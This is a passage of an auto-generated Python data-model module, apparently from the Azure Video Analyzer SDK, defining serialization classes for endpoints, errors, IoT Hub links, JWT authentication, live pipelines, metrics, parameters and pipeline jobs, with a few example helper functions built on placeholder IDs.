endpoint_url: str :param type: Required. The type of the endpoint. Possible values include: "ClientApi". :type type: str or ~video_analyzer.models.VideoAnalyzerEndpointType """ _validation = { 'type': {'required': True}, } _attribute_map = { 'endpoint_url': {'key': 'endpointUrl', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, } def __init__( self, **kwargs ): super(Endpoint, self).__init__(**kwargs) self.endpoint_url = kwargs.get('endpoint_url', None) self.type = kwargs['type'] class EndpointBase(msrest.serialization.Model): """Base class for endpoints. You probably want to use the sub-classes and not this class directly. Known sub-classes are: TlsEndpoint, UnsecuredEndpoint. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param credentials: Required. Credentials to be presented to the endpoint. :type credentials: ~video_analyzer.models.CredentialsBase :param url: Required. The endpoint URL for Video Analyzer to connect to. :type url: str :param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint URL. This is an optional property, typically used when the endpoint is behind a firewall. :type tunnel: ~video_analyzer.models.TunnelBase """ _validation = { 'type': {'required': True}, 'credentials': {'required': True}, 'url': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'credentials': {'key': 'credentials', 'type': 'CredentialsBase'}, 'url': {'key': 'url', 'type': 'str'}, 'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.TlsEndpoint': 'TlsEndpoint', '#Microsoft.VideoAnalyzer.UnsecuredEndpoint': 'UnsecuredEndpoint'} } def __init__( self, **kwargs ): super(EndpointBase, self).__init__(**kwargs) self.type = None # type: Optional[str] self.credentials = kwargs['credentials'] self.url = kwargs['url'] self.tunnel = kwargs.get('tunnel', None) class ErrorAdditionalInfo(msrest.serialization.Model): """The resource management error additional info. Variables are only populated by the server, and will be ignored when sending a request. :ivar type: The additional info type. :vartype type: str :ivar info: The additional info. :vartype info: any """ _validation = { 'type': {'readonly': True}, 'info': {'readonly': True}, } _attribute_map = { 'type': {'key': 'type', 'type': 'str'}, 'info': {'key': 'info', 'type': 'object'}, } def __init__( self, **kwargs ): super(ErrorAdditionalInfo, self).__init__(**kwargs) self.type = None self.info = None class ErrorDetail(msrest.serialization.Model): """The error detail. Variables are only populated by the server, and will be ignored when sending a request. :ivar code: The error code. :vartype code: str :ivar message: The error message. :vartype message: str :ivar target: The error target.
:vartype target: str :ivar details: The error details. :vartype details: list[~video_analyzer.models.ErrorDetail] :ivar additional_info: The error additional info. :vartype additional_info: list[~video_analyzer.models.ErrorAdditionalInfo] """ _validation = { 'code': {'readonly': True}, 'message': {'readonly': True}, 'target': {'readonly': True}, 'details': {'readonly': True}, 'additional_info': {'readonly': True}, } _attribute_map = { 'code': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'target': {'key': 'target', 'type': 'str'}, 'details': {'key': 'details', 'type': '[ErrorDetail]'}, 'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'}, } def __init__( self, **kwargs ): super(ErrorDetail, self).__init__(**kwargs) self.code = None self.message = None self.target = None self.details = None self.additional_info = None class ErrorResponse(msrest.serialization.Model): """Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.). :param error: The error object. :type error: ~video_analyzer.models.ErrorDetail """ _attribute_map = { 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, **kwargs ): super(ErrorResponse, self).__init__(**kwargs) self.error = kwargs.get('error', None) class GroupLevelAccessControl(msrest.serialization.Model): """Group level network access control. :param public_network_access: Whether or not public network access is allowed for specified resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled". :type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess """ _attribute_map = { 'public_network_access': {'key': 'publicNetworkAccess', 'type': 'str'}, } def __init__( self, **kwargs ): super(GroupLevelAccessControl, self).__init__(**kwargs) self.public_network_access = kwargs.get('public_network_access', None) class IotHub(msrest.serialization.Model): """The IoT Hub details. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param id: Required. The IoT Hub resource identifier. :type id: str :param identity: Required. The IoT Hub identity. :type identity: ~video_analyzer.models.ResourceIdentity :ivar status: The current status of the IoT Hub mapping. :vartype status: str """ _validation = { 'id': {'required': True}, 'identity': {'required': True}, 'status': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'identity': {'key': 'identity', 'type': 'ResourceIdentity'}, 'status': {'key': 'status', 'type': 'str'}, } def __init__( self, **kwargs ): super(IotHub, self).__init__(**kwargs) self.id = kwargs['id'] self.identity = kwargs['identity'] self.status = None
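# Illustrative sketch (not part of the generated models): registering an IoT
# Hub with the account through a user-assigned managed identity. Both resource
# IDs below are placeholders; ResourceIdentity is defined later in this module
# and resolves at call time.
def _example_iot_hub():
    """Return a sample IotHub reference using a user-assigned managed identity."""
    return IotHub(
        id='/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/my-rg/providers/Microsoft.Devices/IotHubs/my-hub',
        identity=ResourceIdentity(user_assigned_identity='/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/my-rg/providers/Microsoft.ManagedIdentity/userAssignedIdentities/my-identity'),
    )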
class JwtAuthentication(AuthenticationBase): """Properties for access validation based on JSON Web Tokens (JWT). All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param issuers: List of expected token issuers. Token issuer is valid if it matches at least one of the given values. :type issuers: list[str] :param audiences: List of expected token audiences. Token audience is valid if it matches at least one of the given values. :type audiences: list[str] :param claims: List of additional token claims to be validated. Token must contain all claims and respective values for it to be valid. :type claims: list[~video_analyzer.models.TokenClaim] :param keys: List of keys which can be used to validate access tokens. Having multiple keys allows for seamless key rotation of the token signing key. Token signature must match exactly one key. :type keys: list[~video_analyzer.models.TokenKey] """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'issuers': {'key': 'issuers', 'type': '[str]'}, 'audiences': {'key': 'audiences', 'type': '[str]'}, 'claims': {'key': 'claims', 'type': '[TokenClaim]'}, 'keys': {'key': 'keys', 'type': '[TokenKey]'}, } def __init__( self, **kwargs ): super(JwtAuthentication, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.JwtAuthentication' # type: str self.issuers = kwargs.get('issuers', None) self.audiences = kwargs.get('audiences', None) self.claims = kwargs.get('claims', None) self.keys = kwargs.get('keys', None) class KeyVaultProperties(msrest.serialization.Model): """The details for accessing the encryption keys in Key Vault. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param key_identifier: Required. The URL of the Key Vault key used to encrypt the account. The key may either be versioned (for example https://vault/keys/mykey/version1) or reference a key without a version (for example https://vault/keys/mykey). :type key_identifier: str :ivar current_key_identifier: The current key used to encrypt the Video Analyzer account, including the key version. :vartype current_key_identifier: str """ _validation = { 'key_identifier': {'required': True}, 'current_key_identifier': {'readonly': True}, } _attribute_map = { 'key_identifier': {'key': 'keyIdentifier', 'type': 'str'}, 'current_key_identifier': {'key': 'currentKeyIdentifier', 'type': 'str'}, } def __init__( self, **kwargs ): super(KeyVaultProperties, self).__init__(**kwargs) self.key_identifier = kwargs['key_identifier'] self.current_key_identifier = None class ListProvisioningTokenInput(msrest.serialization.Model): """The input parameters to generate a registration token for the Azure Video Analyzer IoT edge module. All required parameters must be populated in order to send to Azure. :param expiration_date: Required. The desired expiration date of the registration token. The Azure Video Analyzer IoT edge module must be initialized and connected to the Internet prior to the token expiration date. :type expiration_date: ~datetime.datetime """ _validation = { 'expiration_date': {'required': True}, } _attribute_map = { 'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'}, } def __init__( self, **kwargs ): super(ListProvisioningTokenInput, self).__init__(**kwargs) self.expiration_date = kwargs['expiration_date']
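# Illustrative sketch (not part of the generated models): requesting a
# provisioning token that stays valid for 30 days. Uses only the standard
# library; the 30-day window is an arbitrary example value.
def _example_provisioning_token_input():
    """Return a sample ListProvisioningTokenInput expiring 30 days from now."""
    import datetime
    return ListProvisioningTokenInput(
        expiration_date=datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=30),
    )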
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param topology_name: The reference to an existing pipeline topology defined for real-time content processing. When activated, this live pipeline will process content according to the pipeline topology definition. :type topology_name: str :param description: An optional description for the pipeline. :type description: str :param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds this capacity, then the service will disconnect temporarily from the camera. It will retry to re-establish connection (with exponential backoff), checking to see if the camera bitrate is now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect other live pipelines in your account. :type bitrate_kbps: int :ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive", "Activating", "Active", "Deactivating". :vartype state: str or ~video_analyzer.models.LivePipelineState :param parameters: List of the instance level parameter values for the user-defined topology parameters. A pipeline can only define or override parameters values for parameters which have been declared in the referenced topology. Topology parameters without a default value must be defined. Topology parameters with a default value can be optionally be overridden. :type parameters: list[~video_analyzer.models.ParameterDefinition] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'state': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'topology_name': {'key': 'properties.topologyName', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'}, 'state': {'key': 'properties.state', 'type': 'str'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'}, } def __init__( self, **kwargs ): super(LivePipeline, self).__init__(**kwargs) self.topology_name = kwargs.get('topology_name', None) self.description = kwargs.get('description', None) self.bitrate_kbps = kwargs.get('bitrate_kbps', None) self.state = None self.parameters = kwargs.get('parameters', None) class LivePipelineCollection(msrest.serialization.Model): """A collection of LivePipeline items. :param value: A collection of LivePipeline items. :type value: list[~video_analyzer.models.LivePipeline] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response). :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[LivePipeline]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(LivePipelineCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None) class LivePipelineOperationStatus(msrest.serialization.Model): """Used for tracking the status of an operation on the live pipeline. 
class LivePipelineOperationStatus(msrest.serialization.Model): """Used for tracking the status of an operation on the live pipeline. Variables are only populated by the server, and will be ignored when sending a request. :ivar name: The name of the live pipeline operation. :vartype name: str :ivar status: The status of the live pipeline operation. :vartype status: str :ivar error: The error details for the live pipeline operation. :vartype error: ~video_analyzer.models.ErrorDetail """ _validation = { 'name': {'readonly': True}, 'status': {'readonly': True}, 'error': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'status': {'key': 'status', 'type': 'str'}, 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, **kwargs ): super(LivePipelineOperationStatus, self).__init__(**kwargs) self.name = None self.status = None self.error = None class LivePipelineUpdate(ProxyResource): """Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param topology_name: The reference to an existing pipeline topology defined for real-time content processing. When activated, this live pipeline will process content according to the pipeline topology definition. :type topology_name: str :param description: An optional description for the pipeline. :type description: str :param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds this capacity, then the service will disconnect temporarily from the camera. It will retry to re-establish the connection (with exponential backoff), checking to see if the camera bitrate is now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect other live pipelines in your account. :type bitrate_kbps: int :ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive", "Activating", "Active", "Deactivating". :vartype state: str or ~video_analyzer.models.LivePipelineState :param parameters: List of the instance level parameter values for the user-defined topology parameters. A pipeline can only define or override parameter values for parameters which have been declared in the referenced topology. Topology parameters without a default value must be defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'state': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'topology_name': {'key': 'properties.topologyName', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'}, 'state': {'key': 'properties.state', 'type': 'str'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'}, } def __init__( self, **kwargs ): super(LivePipelineUpdate, self).__init__(**kwargs) self.topology_name = kwargs.get('topology_name', None) self.description = kwargs.get('description', None) self.bitrate_kbps = kwargs.get('bitrate_kbps', None) self.state = None self.parameters = kwargs.get('parameters', None) class LogSpecification(msrest.serialization.Model): """A diagnostic log emitted by service. Variables are only populated by the server, and will be ignored when sending a request. :ivar name: The diagnostic log category name. :vartype name: str :ivar display_name: The diagnostic log category display name. :vartype display_name: str :ivar blob_duration: The time range for requests in each blob. :vartype blob_duration: str """ _validation = { 'name': {'readonly': True}, 'display_name': {'readonly': True}, 'blob_duration': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'blob_duration': {'key': 'blobDuration', 'type': 'str'}, } def __init__( self, **kwargs ): super(LogSpecification, self).__init__(**kwargs) self.name = None self.display_name = None self.blob_duration = None class MetricDimension(msrest.serialization.Model): """A metric dimension. Variables are only populated by the server, and will be ignored when sending a request. :ivar name: The metric dimension name. :vartype name: str :ivar display_name: The display name for the dimension. :vartype display_name: str :ivar to_be_exported_for_shoebox: Whether to export metric to shoebox. :vartype to_be_exported_for_shoebox: bool """ _validation = { 'name': {'readonly': True}, 'display_name': {'readonly': True}, 'to_be_exported_for_shoebox': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'to_be_exported_for_shoebox': {'key': 'toBeExportedForShoebox', 'type': 'bool'}, } def __init__( self, **kwargs ): super(MetricDimension, self).__init__(**kwargs) self.name = None self.display_name = None self.to_be_exported_for_shoebox = None class MetricSpecification(msrest.serialization.Model): """A metric emitted by service. Variables are only populated by the server, and will be ignored when sending a request. :ivar name: The metric name. :vartype name: str :ivar display_name: The metric display name. :vartype display_name: str :ivar display_description: The metric display description. :vartype display_description: str :ivar unit: The metric unit. Possible values include: "Bytes", "Count", "Milliseconds". :vartype unit: str or ~video_analyzer.models.MetricUnit :ivar aggregation_type: The metric aggregation type. Possible values include: "Average", "Count", "Total". 
:vartype aggregation_type: str or ~video_analyzer.models.MetricAggregationType :ivar lock_aggregation_type: The metric lock aggregation type. Possible values include: "Average", "Count", "Total". :vartype lock_aggregation_type: str or ~video_analyzer.models.MetricAggregationType :param supported_aggregation_types: Supported aggregation types. :type supported_aggregation_types: list[str] :ivar dimensions: The metric dimensions. :vartype dimensions: list[~video_analyzer.models.MetricDimension] :ivar enable_regional_mdm_account: Indicates whether regional MDM account is enabled. :vartype enable_regional_mdm_account: bool :ivar source_mdm_account: The source MDM account. :vartype source_mdm_account: str :ivar source_mdm_namespace: The source MDM namespace. :vartype source_mdm_namespace: str :ivar supported_time_grain_types: The supported time grain types. :vartype supported_time_grain_types: list[str] """ _validation = { 'name': {'readonly': True}, 'display_name': {'readonly': True}, 'display_description': {'readonly': True}, 'unit': {'readonly': True}, 'aggregation_type': {'readonly': True}, 'lock_aggregation_type': {'readonly': True}, 'dimensions': {'readonly': True}, 'enable_regional_mdm_account': {'readonly': True}, 'source_mdm_account': {'readonly': True}, 'source_mdm_namespace': {'readonly': True}, 'supported_time_grain_types': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'display_description': {'key': 'displayDescription', 'type': 'str'}, 'unit': {'key': 'unit', 'type': 'str'}, 'aggregation_type': {'key': 'aggregationType', 'type': 'str'}, 'lock_aggregation_type': {'key': 'lockAggregationType', 'type': 'str'}, 'supported_aggregation_types': {'key': 'supportedAggregationTypes', 'type': '[str]'}, 'dimensions': {'key': 'dimensions', 'type': '[MetricDimension]'}, 'enable_regional_mdm_account': {'key': 'enableRegionalMdmAccount', 'type': 'bool'}, 'source_mdm_account': {'key': 'sourceMdmAccount', 'type': 'str'}, 'source_mdm_namespace': {'key': 'sourceMdmNamespace', 'type': 'str'}, 'supported_time_grain_types': {'key': 'supportedTimeGrainTypes', 'type': '[str]'}, } def __init__( self, **kwargs ): super(MetricSpecification, self).__init__(**kwargs) self.name = None self.display_name = None self.display_description = None self.unit = None self.aggregation_type = None self.lock_aggregation_type = None self.supported_aggregation_types = kwargs.get('supported_aggregation_types', None) self.dimensions = None self.enable_regional_mdm_account = None self.source_mdm_account = None self.source_mdm_namespace = None self.supported_time_grain_types = None class NetworkAccessControl(msrest.serialization.Model): """Network access control for video analyzer account. :param integration: Public network access for integration group. :type integration: ~video_analyzer.models.GroupLevelAccessControl :param ingestion: Public network access for ingestion group. :type ingestion: ~video_analyzer.models.GroupLevelAccessControl :param consumption: Public network access for consumption group. 
:type consumption: ~video_analyzer.models.GroupLevelAccessControl """ _attribute_map = { 'integration': {'key': 'integration', 'type': 'GroupLevelAccessControl'}, 'ingestion': {'key': 'ingestion', 'type': 'GroupLevelAccessControl'}, 'consumption': {'key': 'consumption', 'type': 'GroupLevelAccessControl'}, } def __init__( self, **kwargs ): super(NetworkAccessControl, self).__init__(**kwargs) self.integration = kwargs.get('integration', None) self.ingestion = kwargs.get('ingestion', None) self.consumption = kwargs.get('consumption', None) class NodeInput(msrest.serialization.Model): """Describes an input signal to be used on a pipeline node. All required parameters must be populated in order to send to Azure. :param node_name: Required. The name of the upstream node in the pipeline whose output is used as input of the current node. :type node_name: str """ _validation = { 'node_name': {'required': True}, } _attribute_map = { 'node_name': {'key': 'nodeName', 'type': 'str'}, } def __init__( self, **kwargs ): super(NodeInput, self).__init__(**kwargs) self.node_name = kwargs['node_name'] class Operation(msrest.serialization.Model): """An operation. All required parameters must be populated in order to send to Azure. :param name: Required. The operation name. :type name: str :param display: The operation display name. :type display: ~video_analyzer.models.OperationDisplay :param origin: Origin of the operation. :type origin: str :param properties: Operation properties format. :type properties: ~video_analyzer.models.Properties :param is_data_action: Whether the operation applies to data-plane. :type is_data_action: bool :param action_type: Indicates the action type. Possible values include: "Internal". :type action_type: str or ~video_analyzer.models.ActionType """ _validation = { 'name': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display': {'key': 'display', 'type': 'OperationDisplay'}, 'origin': {'key': 'origin', 'type': 'str'}, 'properties': {'key': 'properties', 'type': 'Properties'}, 'is_data_action': {'key': 'isDataAction', 'type': 'bool'}, 'action_type': {'key': 'actionType', 'type': 'str'}, } def __init__( self, **kwargs ): super(Operation, self).__init__(**kwargs) self.name = kwargs['name'] self.display = kwargs.get('display', None) self.origin = kwargs.get('origin', None) self.properties = kwargs.get('properties', None) self.is_data_action = kwargs.get('is_data_action', None) self.action_type = kwargs.get('action_type', None) class OperationCollection(msrest.serialization.Model): """A collection of Operation items. :param value: A collection of Operation items. :type value: list[~video_analyzer.models.Operation] """ _attribute_map = { 'value': {'key': 'value', 'type': '[Operation]'}, } def __init__( self, **kwargs ): super(OperationCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) class OperationDisplay(msrest.serialization.Model): """Operation details. :param provider: The service provider. :type provider: str :param resource: Resource on which the operation is performed. :type resource: str :param operation: The operation type. :type operation: str :param description: The operation description.
:type description: str """ _attribute_map = { 'provider': {'key': 'provider', 'type': 'str'}, 'resource': {'key': 'resource', 'type': 'str'}, 'operation': {'key': 'operation', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, } def __init__( self, **kwargs ): super(OperationDisplay, self).__init__(**kwargs) self.provider = kwargs.get('provider', None) self.resource = kwargs.get('resource', None) self.operation = kwargs.get('operation', None) self.description = kwargs.get('description', None) class ParameterDeclaration(msrest.serialization.Model): """Single topology parameter declaration. Declared parameters can and must be referenced throughout the topology and can optionally have default values to be used when they are not defined in the pipelines. All required parameters must be populated in order to send to Azure. :param name: Required. Name of the parameter. :type name: str :param type: Required. Type of the parameter. Possible values include: "String", "SecretString", "Int", "Double", "Bool". :type type: str or ~video_analyzer.models.ParameterType :param description: Description of the parameter. :type description: str :param default: The default value for the parameter to be used if the pipeline does not specify a value. :type default: str """ _validation = { 'name': {'required': True}, 'type': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, 'default': {'key': 'default', 'type': 'str'}, } def __init__( self, **kwargs ): super(ParameterDeclaration, self).__init__(**kwargs) self.name = kwargs['name'] self.type = kwargs['type'] self.description = kwargs.get('description', None) self.default = kwargs.get('default', None) class ParameterDefinition(msrest.serialization.Model): """Defines the parameter value of a specific pipeline topology parameter. See pipeline topology parameters for more information. All required parameters must be populated in order to send to Azure. :param name: Required. Name of the parameter declared in the pipeline topology. :type name: str :param value: Parameter value to be applied on this specific pipeline. :type value: str """ _validation = { 'name': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'value': {'key': 'value', 'type': 'str'}, } def __init__( self, **kwargs ): super(ParameterDefinition, self).__init__(**kwargs) self.name = kwargs['name'] self.value = kwargs.get('value', None) class PemCertificateList(CertificateSource): """A list of PEM formatted certificates. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param certificates: Required. PEM formatted public certificates. One certificate per entry. :type certificates: list[str] """ _validation = { 'type': {'required': True}, 'certificates': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'certificates': {'key': 'certificates', 'type': '[str]'}, } def __init__( self, **kwargs ): super(PemCertificateList, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.PemCertificateList' # type: str self.certificates = kwargs['certificates']
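# Illustrative sketch (not part of the generated models): a topology-level
# parameter declaration paired with the pipeline-level value that overrides it.
# The parameter name and URLs are placeholders; 'String' is one of the
# documented ParameterDeclaration types.
def _example_parameters():
    """Return a sample (ParameterDeclaration, ParameterDefinition) pair."""
    declaration = ParameterDeclaration(
        name='rtspUrlParameter',
        type='String',
        description='RTSP URL of the source camera.',
        default='rtsp://localhost:554/stream',
    )
    definition = ParameterDefinition(name='rtspUrlParameter', value='rtsp://camera001.contoso.example/stream')
    return declaration, definition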
class PipelineJob(ProxyResource): """Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param topology_name: Reference to an existing pipeline topology. When activated, this pipeline job will process content according to the pipeline topology definition. :type topology_name: str :param description: An optional description for the pipeline. :type description: str :ivar state: Current state of the pipeline (read-only). Possible values include: "Processing", "Canceled", "Completed", "Failed". :vartype state: str or ~video_analyzer.models.PipelineJobState :ivar expiration: The date-time by when this pipeline job will be automatically deleted from your account. :vartype expiration: ~datetime.datetime :ivar error: Details about the error, in case the pipeline job fails. :vartype error: ~video_analyzer.models.PipelineJobError :param parameters: List of the instance level parameter values for the user-defined topology parameters. A pipeline can only define or override parameter values for parameters which have been declared in the referenced topology. Topology parameters without a default value must be defined. Topology parameters with a default value can optionally be overridden. :type parameters: list[~video_analyzer.models.ParameterDefinition] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'state': {'readonly': True}, 'expiration': {'readonly': True}, 'error': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'topology_name': {'key': 'properties.topologyName', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'state': {'key': 'properties.state', 'type': 'str'}, 'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'}, 'error': {'key': 'properties.error', 'type': 'PipelineJobError'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'}, } def __init__( self, **kwargs ): super(PipelineJob, self).__init__(**kwargs) self.topology_name = kwargs.get('topology_name', None) self.description = kwargs.get('description', None) self.state = None self.expiration = None self.error = None self.parameters = kwargs.get('parameters', None) class PipelineJobCollection(msrest.serialization.Model): """A collection of PipelineJob items. :param value: A collection of PipelineJob items. :type value: list[~video_analyzer.models.PipelineJob] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response).
:type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[PipelineJob]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(PipelineJobCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None) class PipelineJobError(msrest.serialization.Model): """Details about the error for a failed pipeline job. :param code: The error code. :type code: str :param message: The error message. :type message: str """ _attribute_map = { 'code': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, } def __init__( self, **kwargs ): super(PipelineJobError, self).__init__(**kwargs) self.code = kwargs.get('code', None) self.message = kwargs.get('message', None) class PipelineJobOperationStatus(msrest.serialization.Model): """Used for tracking the status of an operation on the pipeline job. Variables are only populated by the server, and will be ignored when sending a request. :ivar name: The name of the pipeline job operation. :vartype name: str :ivar status: The status of the pipeline job operation. :vartype status: str :ivar error: The error details for the pipeline job operation. :vartype error: ~video_analyzer.models.ErrorDetail """ _validation = { 'name': {'readonly': True}, 'status': {'readonly': True}, 'error': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'status': {'key': 'status', 'type': 'str'}, 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, **kwargs ): super(PipelineJobOperationStatus, self).__init__(**kwargs) self.name = None self.status = None self.error = None class PipelineJobUpdate(ProxyResource): """Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param topology_name: Reference to an existing pipeline topology. When activated, this pipeline job will process content according to the pipeline topology definition. :type topology_name: str :param description: An optional description for the pipeline. :type description: str :ivar state: Current state of the pipeline (read-only). Possible values include: "Processing", "Canceled", "Completed", "Failed". :vartype state: str or ~video_analyzer.models.PipelineJobState :ivar expiration: The date-time by when this pipeline job will be automatically deleted from your account. :vartype expiration: ~datetime.datetime :ivar error: Details about the error, in case the pipeline job fails. :vartype error: ~video_analyzer.models.PipelineJobError :param parameters: List of the instance level parameter values for the user-defined topology parameters. A pipeline can only define or override parameter values for parameters which have been declared in the referenced topology. Topology parameters without a default value must be defined.
